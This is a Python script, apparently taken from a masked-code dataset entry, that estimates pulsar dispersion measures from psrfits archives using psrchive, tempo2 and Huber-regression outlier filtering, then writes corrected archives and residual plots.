args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... 
'\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... '),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... 
'),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk '{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 
'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = tmp2.split('\\n')\n freqtmp2 = np.zeros(np.size(amjdnew1))\n toastmp2 = np.zeros(np.size(amjdnew1))\n TErrtmp2 = np.zeros(np.size(amjdnew1))\n for i in range(np.size(amjdnew1)):\n _, freqtmp2[i], toastmp2[i], TErrtmp2[i] = tmp3[i].split()\n freqf1 = np.around(np.extract(condition2, freqtmp2), 3)\n amjdf1 = np.extract(condition2, amjdnew1)\n toasf1 = np.extract(condition2, toastmp2)\n terrf1 = np.extract(condition2, TErrtmp2)\n toasf1 *= 1000000.0\n postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n ar_nbin = newarch.get_nbin()\n ar_nchn = newarch.get_nchan()\n if narch == 1:\n freq_bot = ar.get_centre_frequency() - ar_bw / 2.0\n freq_top = ar.get_centre_frequency() + ar_bw / 2.0\n if narch > 1:\n if ar_bw == 200.0:\n freq_bot = 400.0\n freq_top = 1460.0\n if ar_bw == 400.0:\n freq_bot = 300.0\n freq_top = 1460.0\n newarch.dedisperse()\n newarch.remove_baseline()\n profdata2D = newarch.get_data()[:, 0, :, :].flatten().reshape(ar_nchn,\n ar_nbin)\n prof = newarch.clone()\n prof.fscrunch()\n profdata1D = prof.get_data().flatten()\n profdata1D /= np.max(profdata1D)\n residDM = init_dm - dmval\n dmcurve = 4.15 * 1000.0 * residDM * (1.0 / (np.min(freqf) / 1000.0) ** \n 2 - 1.0 / (freqf / 1000.0) ** 2)\n dmoff = np.median(toasf) - np.median(dmcurve)\n dmcurve += dmoff\n fig = plt.figure(3, figsize=(8, 6))\n fig.subplots_adjust(hspace=0.05)\n ax0 = plt.subplot2grid((3, 8), (0, 0), rowspan=2, colspan=3)\n ax1 = plt.subplot2grid((3, 8), (2, 0), rowspan=1, colspan=3)\n ax2 = plt.subplot2grid((3, 8), (0, 4), colspan=4)\n ax3 = plt.subplot2grid((3, 8), (1, 4), colspan=4)\n ax4 = plt.subplot2grid((3, 8), (2, 4), colspan=4)\n ax0.imshow(np.sqrt(profdata2D ** 2) ** 0.5, origin='lower', extent=(0, \n ar_nbin - 1, freq_bot, freq_top), aspect='auto', cmap='hot')\n ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n ax0.tick_params(axis='x', which='both', bottom=True, top=True,\n labelbottom=False)\n ax1.plot(np.arange(ar_nbin, dtype=float), profdata1D, color='black',\n linewidth=0.5)\n ax1.set_xlim(0, ar_nbin - 1)\n ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp, fmt='.', color='gray',\n label='Prefit: Unfiltered', capsize=2)\n 
ax2.plot(freqtmp, y_pred, '--r', label='Polynomial Fit')\n ax2.set_xlim(freq_bot, freq_top)\n ax2.grid()\n ax2.legend(loc='upper right')\n ax2.axes.xaxis.set_ticklabels([])\n ax3.yaxis.set_label_position('right')\n ax3.errorbar(freqf, toasf - np.median(toasf), terrf, fmt='.k', label=\n 'Prefit: Filtered', capsize=2)\n ax3.set_xlim(freq_bot, freq_top)\n ax3.grid()\n ax3.legend(loc='upper right')\n ax3.axes.xaxis.set_ticklabels([])\n ax3.set_ylabel('ToA Residuals ($\\\\mu$s)', fontweight='bold', fontsize=12)\n ax4.errorbar(freqf1, toasf1 - np.median(toasf1), terrf1, fmt='.r',\n label='Postfit', capsize=2)\n ax4.set_xlim(freq_bot, freq_top)\n ax4.grid()\n ax4.legend(loc='upper right')\n ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n fig.suptitle(\n \"\"\"Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\\\mu$s; Postfit Wrms: %.2f $\\\\mu$s\nMedian ToA Err: %.2f $\\\\mu$s; DM: %.6f $\\\\pm$ %.6f pc cm$^{-3}$; Reduced $\\\\chi^2$: %.2f\"\"\"\n % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(\n terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n dirplot = os.path.join(pwd, ar_psr + '_' + ar_tel + '_plots')\n if not os.path.exists(dirplot):\n os.makedirs(dirplot)\n plotfile = dirplot + '/' + ar_psr + '_' + str(ar_mjd) + '_' + str(ar_centfr\n ) + '_' + ar_tel + '_DMfitResid.pdf'\n plt.savefig(plotfile, format='pdf')\n plt.close()\n if not quiet:\n print('done!')\n del ar\n return dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1)\n\n\n<mask token>\n\n\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\n<mask token>\n\n\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n for i in range(narch):\n archives[i].tscrunch()\n if archives[0].get_telescope() == 'GMRT':\n for i in range(narch):\n ar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n ar_frq = archives[i].get_centre_frequency()\n ar_bw = archives[i].get_bandwidth()\n period = archives[i].get_Integration(0).get_folding_period()\n offset = 0.670520675\n jump = offset / period - int(offset / period)\n if ar_frq >= 1260.0 and ar_frq < 1460.0:\n if ar_mjd >= 58810.0 and ar_mjd < 58991.0:\n archives[i].rotate_phase(-jump)\n freq_append = psrchive.FrequencyAppend()\n ttfreq = archives[0].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[0].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[0].fscrunch(b5scrunch)\n freq_append.init(archives[0])\n while 
len(archives) > 1:\n ttfreq = archives[1].get_centre_frequency()\n if 300.0 < ttfreq < 500.0:\n archives[1].fscrunch(b3scrunch)\n if 1160.0 < ttfreq < 1460.0:\n archives[1].fscrunch(b5scrunch)\n freq_append.append(archives[0], archives[1])\n del archives[1]\n return archives[0]\n\n\nmain()\n",
"step-3": "<mask token>\nmatplotlib.use('Agg')\n<mask token>\nstart = time.time()\nparser = argparse.ArgumentParser(description='Code for measuring in-band ' +\n 'DM for pulsar data in psrfits format.')\nparser.add_argument('files', nargs='+', type=str, help=\n 'The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, help=\n 'Ephemeris file to update the model. Exits if not ' +\n 'given or is not available in \"PWD/ephemerides\" ' + 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str, help=\n 'Model template for ToA generation. Exits if not ' +\n 'given or is not available in \"PWD/templates\" ' + 'directory')\nparser.add_argument('-f', '--fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f', '--b3fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f', '--b5fscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of channels for ' +\n 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w', '--writeout', action='store_true', help=\n 'Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa', '--print_toas', action='store_true', help=\n 'Print the prefit ToAs to file in tempo2 format. ' + 'Def: False')\nparser.add_argument('-F', '--Fscrunch', action='store_true', help=\n 'Fully scrunch the number of channels for the ' +\n 'final output archive (Def: False)')\nparser.add_argument('-T', '--Tscrunch', action='store_true', help=\n 'Completely time scrunch all the integrations')\nparser.add_argument('-t', '--tscrunch', type=int, default=1, help=\n 'Factor to scrunch the number of integrations for ' +\n 'the final output archive (Def: None)')\nparser.add_argument('-o', '--offset', type=float, default=0.670520675, help\n ='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', help=\n 'Only print warnings')\n\n\ndef main():\n args = parser.parse_args()\n quiet = False\n if args.quiet:\n quiet = True\n tempo2 = True\n ptoa = False\n if args.print_toas:\n ptoa = True\n if not quiet:\n print('Loading the archive files for DM estimation')\n archives = []\n for filename in args.files:\n archives.append(psrchive.Archive_load(filename))\n narch = len(archives)\n if narch >= 1:\n if not quiet:\n print('Appending the archives ...'),\n ar = freq_appendData(narch, archives, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if not quiet:\n print(' done!')\n elif not quiet:\n print('Only one archive was given, so nothing to frequency-append.')\n ar = archives[0]\n del archives\n ar_psr = ar.get_source()\n ar_nbins = ar.get_nbin()\n ar_tel = ar.get_telescope()\n mjd_start = ar.get_Integration(0).get_start_time().in_days()\n mjd_end = ar.get_Integration(0).get_end_time().in_days()\n ar_mjd = mjd_start + (mjd_end - mjd_start) / 2.0\n length = ar.integration_length()\n ar.update_centre_frequency()\n ar_centfr = ar.get_centre_frequency()\n ar_nchan = ar.get_nchan()\n ar_bw = ar.get_bandwidth()\n ar_chnwdth = ar_bw / ar_nchan\n ffrac = args.fscrunch\n if not quiet:\n print('\\nNow preparing for DM estimation\\n')\n pwd = os.getcwd()\n if args.ephem != None:\n ephemeris = args.ephem\n else:\n ephemeris = 'ephemerides/' + ar_psr + '.par'\n if not os.path.exists(ephemeris):\n sys.exit(1)\n if not quiet:\n print('\\nEphemeris file is:' + ephemeris + '\\n')\n model = []\n for filename in args.model:\n 
model.append(psrchive.Archive_load(filename))\n if args.model != None:\n if len(args.model) == 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if len(args.model) > 1:\n model = freq_appendModel(1, model, args.offset, args.b3fscrunch,\n args.b5fscrunch)\n if args.model == None:\n if not quiet:\n print('Looking for matching template in templates directory...'),\n import subprocess\n tempdir = 'templates/*.sm'\n tempfile = ar_psr + '_tmp.txt'\n a = subprocess.call(\n \"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\" % (tempdir,\n tempfile), shell=True)\n tempnchan = ''\n t1 = str(ar_nbins)\n if ar_tel == 'gmrt':\n t2 = str(int(ar_bw))\n else:\n t2 = str(ar_bw)\n t3 = '%.2f' % ar_centfr\n f = open(tempfile, 'r')\n for line in f:\n line = line.strip()\n columns = line.split()\n t4 = float(columns[5])\n t4 = '%.2f' % t4\n if ar_tel == 'gmrt':\n if columns[1] == ar_psr and columns[2] == t1 and str(int(\n columns[3])) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n elif columns[1] == ar_psr and columns[2] == t1 and str(columns[3]\n ) == t2 and t4 == t3:\n modeltempl = columns[0]\n tempnchan = columns[4]\n if not quiet:\n print(' done\\n')\n if modeltempl == '' and tempnchan == '':\n print(\n '\\n** No matching template found for DM fitting. Exiting. **\\n'\n )\n sys.exit(1)\n f.close()\n os.remove(tempfile)\n if not quiet:\n print('Found matching template: ' + modeltempl)\n model.append(psrchive.Archive_load(modeltempl))\n if not quiet:\n print('\\nEstimating the DM from the observation')\n model.update_centre_frequency()\n arch = ar.clone()\n dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch,\n ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch)\n if args.writeout:\n infile = open(ephemeris, 'r')\n tmpeph = ar_psr + '.eph'\n output = open(tmpeph, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 'DM\\t\\t\\t ' + str(dmval) + '\\t\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t\\t ' + str(round(ar_mjd, 2))\n if not args.quiet:\n print('Updating the ephemeris with new DM... '),\n f = open(tmpeph, 'a')\n f.write('%s\\n %s\\n' % (dmline, dmepochline))\n if not args.quiet:\n print(' done!')\n f.close()\n if not quiet:\n print(\n 'Correcting the DM of the observed file and writing it out... 
'\n ),\n os.remove(tmpeph)\n dirfinal = os.path.join(pwd, ar_psr + '_' + ar_tel + '_final')\n if not os.path.exists(dirfinal):\n os.makedirs(dirfinal)\n outfile = dirfinal + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '.ar'\n ar.set_dispersion_measure(dmval)\n ar.dedisperse()\n if not args.Tscrunch:\n ar.tscrunch(args.tscrunch)\n else:\n ar.tscrunch()\n if not args.Fscrunch:\n ar.fscrunch(ffrac)\n else:\n ar.fscrunch()\n ar.unload(outfile)\n if not args.quiet:\n print(' done!')\n del ar\n if not quiet:\n print('The file is corrected for DM and is written out to\\n' +\n outfile)\n f = open(ar_psr + '_DM_timeseries.txt', 'a')\n f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' % (\n filename, ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms,\n ToA_Err, ar_centfr, ar_bw, ar_tel))\n f.close()\n import time\n end = time.time()\n total = end - start\n print(\n '-----------------------------------------------------------------------------'\n )\n print('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n print('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr,\n fitchisq, ar_centfr, ar_bw, ar_tel))\n print(\n '-----------------------------------------------------------------------------'\n )\n print('\\nThe program took %.1f seconds to finish' % total)\n\n\n<mask token>\n\n\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model,\n ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):\n if model == None:\n sys.exit(1)\n init_dm = ar.get_dispersion_measure()\n if not quiet:\n print('Using the ArrivalTime (pat) with PGS in Tempo2 format')\n arrtim = psrchive.ArrivalTime()\n arrtim.set_shift_estimator('PGS')\n arrtim.set_format('Tempo2')\n arrtim.set_format_flags('IPTA')\n if not quiet:\n print('Loading the template file for processing... '),\n std = model.clone()\n std.pscrunch()\n std.tscrunch()\n std_nchan = std.get_nchan()\n std.dedisperse()\n std.fscrunch(ffrac)\n arrtim.set_standard(std)\n if not quiet:\n print(' done!')\n ar.fscrunch(ffrac)\n ar.pscrunch()\n ar.tscrunch()\n arrtim.set_observation(ar)\n if not quiet:\n print('Finding the ToAs... '),\n toas = arrtim.get_toas()\n toas_filtered = [x.split()[:5] for x in toas]\n str_filename, str_freq, str_mjd, str_toaErr, str_site = zip(*toas_filtered)\n freq = np.asarray(str_freq, dtype=np.float64)\n amjd = np.asarray(str_mjd, dtype=np.float64)\n terr = np.asarray(str_toaErr, dtype=np.float64)\n if not quiet:\n print(' done!')\n print('Removing the bad ToAs using Huber Regression... 
'),\n condition1 = terr < 3 * np.median(terr)\n freqnew = np.extract(condition1, freq)\n amjdnew = np.extract(condition1, amjd)\n terrnew = np.extract(condition1, terr)\n tempfile = ar_psr + '_tmp.txt'\n f = open(tempfile, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename[0], freqnew[i],\n amjdnew[i], terrnew[i], str_site[0]))\n f.close()\n tmpstr = 'tempo2 -output general2 -f'\n tmp = os.popen(tmpstr + \n ' %s %s -s \"1111111 {freq} {pre} {err}\\n\" | grep \\'1111111\\'' % (\n ephemeris, tempfile)).read()\n os.remove(tempfile)\n tmp1 = tmp.split('\\n')\n freqtmp = np.zeros(np.size(amjdnew))\n toastmp = np.zeros(np.size(amjdnew))\n TErrtmp = np.zeros(np.size(amjdnew))\n for i in range(np.size(amjdnew)):\n _, freqtmp[i], toastmp[i], TErrtmp[i] = tmp1[i].split()\n TErrtmp /= 1000000.0\n from sklearn import linear_model\n from sklearn.linear_model import HuberRegressor\n from sklearn.preprocessing import PolynomialFeatures\n from sklearn.pipeline import make_pipeline\n freqarr = freqtmp.reshape(-1, 1)\n toastmp *= 1000000.0\n toashift = np.min(toastmp) * -1.5\n toastmp += toashift\n Terrtmp = TErrtmp * 1000000.0\n model = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n model.fit(freqarr, toastmp, huberregressor__sample_weight=np.ravel(1.0 /\n Terrtmp))\n y_pred = model.predict(freqarr)\n residuals = toastmp - y_pred\n median = np.median(residuals)\n MAD = np.median(np.abs(residuals - np.median(residuals))\n ) / 0.6744897501960817\n condition2 = (residuals > median - 3 * MAD) & (residuals < median + 3 * MAD\n )\n freqf = np.around(np.extract(condition2, freqarr), 3)\n amjdf = np.extract(condition2, amjdnew)\n toasf = np.extract(condition2, toastmp)\n terrf = np.extract(condition2, TErrtmp)\n prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n terrf *= 1000000.0\n if not quiet:\n print(' done!')\n if ptoa:\n if not quiet:\n print('Writing out ToAs into a file in tempo2 format'),\n dirtoas = os.path.join(pwd, ar_psr + '_' + ar_tel + '_ToAs')\n if not os.path.exists(dirtoas):\n os.makedirs(dirtoas)\n outfile = dirtoas + '/' + ar_psr + '_' + str(ar_mjd\n ) + '_' + ar_tel + '_ToAs.txt'\n f = open(outfile, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print('done!')\n if not quiet:\n print('\\nWriting the ToAs to a temporary file for tempo2 fitting...'),\n outfiletmp = ar_psr + 'tmp_ToAs.txt'\n f = open(outfiletmp, 'w+')\n head = 'FORMAT 1'\n f.write('%s\\n' % head)\n for i in range(0, np.size(freqf)):\n f.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i],\n amjdf[i], terrf[i], str_site[0]))\n f.close()\n if not quiet:\n print(' done!\\n')\n dmstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk '{print $5,$6}'\"\n % (ephemeris, outfiletmp)).read()\n dm, dmerr = dmstr.split()\n dmval = float(dm)\n dmverr = float(dmerr)\n chisqstr = os.popen(\n \"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk '{print $9}'\" %\n (ephemeris, outfiletmp)).read()\n fitchisq = float(chisqstr)\n os.remove(outfiletmp)\n infile = open(ephemeris, 'r')\n tmpeph1 = ar_psr + '_tmpeph.eph'\n output = open(tmpeph1, 'w+')\n for i, line in enumerate(infile):\n if not line.lstrip().startswith('DM'):\n if not line.lstrip().startswith('DMEPOCH'):\n output.write(line)\n infile.close()\n output.close()\n dmline = 
'DM ' + str(dmval) + '\\t1\\t' + str(dmverr)\n dmepochline = 'DMEPOCH\\t ' + str(round(ar_mjd, 2))\n f = open(tmpeph1, 'a')\n f.write('%s\\n%s\\n' % (dmline, dmepochline))\n f.close()\n newarch = ar.clone()\n newarch.tscrunch()\n newarch.set_dispersion_measure(dmval)\n arrtim.set_observation(newarch)\n arrtim.set_standard(std)\n toas1 = arrtim.get_toas()\n toas1_filtered = [x.split()[:5] for x in toas1]\n str_filename1, str_freq1, str_mjd1, str_toaErr1, str_site1 = zip(*\n toas1_filtered)\n freq1 = np.asarray(str_freq1, dtype=np.float64)\n amjd1 = np.asarray(str_mjd1, dtype=np.float64)\n terr1 = np.asarray(str_toaErr1, dtype=np.float64)\n freqnew1 = np.extract(condition1, freq1)\n amjdnew1 = np.extract(condition1, amjd1)\n terrnew1 = np.extract(condition1, terr1)\n tempfile1 = ar_psr + '_tmp1.txt'\n f = open(tempfile1, 'w+')\n head = 'FORMAT 1\\n'\n f.write('%s' % head)\n for i in range(0, np.size(freqnew1)):\n f.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i],\n amjdnew1[i], terrnew1[i], str_site1[0]))\n f.close()\n tmp2 = os.popen(\n \"\"\"tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'\"\"\"\n % (tmpeph1, tempfile1)).read()\n os.remove(tempfile1)\n os.remove(tmpeph1)\n tmp3 = 